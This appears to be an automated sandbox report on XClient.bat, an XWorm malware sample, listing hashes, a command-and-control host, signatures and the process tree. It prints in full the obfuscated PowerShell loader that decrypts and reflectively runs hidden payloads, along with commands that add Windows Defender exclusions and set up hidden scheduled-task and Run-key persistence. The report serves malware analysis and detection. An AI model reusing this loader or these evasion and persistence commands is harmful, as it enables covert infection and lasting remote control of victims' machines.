Analysis
-
max time kernel
106s
-
max time network
125s
-
platform
windows11-21h2_x64
-
resource
win11-20240508-en
-
resource tags
arch:x64 arch:x86 image:win11-20240508-en locale:en-us os:windows11-21h2-x64 system
-
submitted
30-05-2024 14:09
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win11-20240508-en
General
-
Target
XClient.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule
behavioral1/memory/5008-48-0x000001806F700000-0x000001806F71A000-memory.dmp family_xworm
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exe
flow pid process
16 5008 powershell.exe
17 5008 powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe
pid process
3084 powershell.exe
4340 powershell.exe
1796 powershell.exe
3252 powershell.exe
3436 powershell.exe
5008 powershell.exe
2352 powershell.exe
-
Drops startup file 2 IoCs
Processes:
powershell.exe
description ioc process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exe
pid process
3236 timeout.exe
-
Modifies registry class 1 IoCs
Processes:
powershell.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe
pid process
2352 powershell.exe
2352 powershell.exe
3436 powershell.exe
3436 powershell.exe
5008 powershell.exe
5008 powershell.exe
3084 powershell.exe
3084 powershell.exe
4340 powershell.exe
4340 powershell.exe
1796 powershell.exe
1796 powershell.exe
3252 powershell.exe
3252 powershell.exe
5008 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exe
pid process
5008 powershell.exe
-
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exe powershell.exe WScript.exe cmd.exe powershell.exe cmd.exe
description pid process target process
PID 4008 wrote to memory of 2352 4008 cmd.exe powershell.exe
PID 4008 wrote to memory of 2352 4008 cmd.exe powershell.exe
PID 2352 wrote to memory of 3436 2352 powershell.exe powershell.exe
PID 2352 wrote to memory of 3436 2352 powershell.exe powershell.exe
PID 2352 wrote to memory of 3616 2352 powershell.exe WScript.exe
PID 2352 wrote to memory of 3616 2352 powershell.exe WScript.exe
PID 3616 wrote to memory of 3656 3616 WScript.exe cmd.exe
PID 3616 wrote to memory of 3656 3616 WScript.exe cmd.exe
PID 3656 wrote to memory of 5008 3656 cmd.exe powershell.exe
PID 3656 wrote to memory of 5008 3656 cmd.exe powershell.exe
PID 5008 wrote to memory of 3084 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 3084 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 4340 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 4340 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 1796 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 1796 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 3252 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 3252 5008 powershell.exe powershell.exe
PID 5008 wrote to memory of 4904 5008 powershell.exe schtasks.exe
PID 5008 wrote to memory of 4904 5008 powershell.exe schtasks.exe
PID 5008 wrote to memory of 4580 5008 powershell.exe schtasks.exe
PID 5008 wrote to memory of 4580 5008 powershell.exe schtasks.exe
PID 5008 wrote to memory of 1160 5008 powershell.exe cmd.exe
PID 5008 wrote to memory of 1160 5008 powershell.exe cmd.exe
PID 1160 wrote to memory of 3236 1160 cmd.exe timeout.exe
PID 1160 wrote to memory of 3236 1160 cmd.exe timeout.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_964_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_964.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_964.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_964.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_964.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_964.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:4904
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"6⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:3236
-
Network
MITRE ATT&CK Enterprise v15
Downloads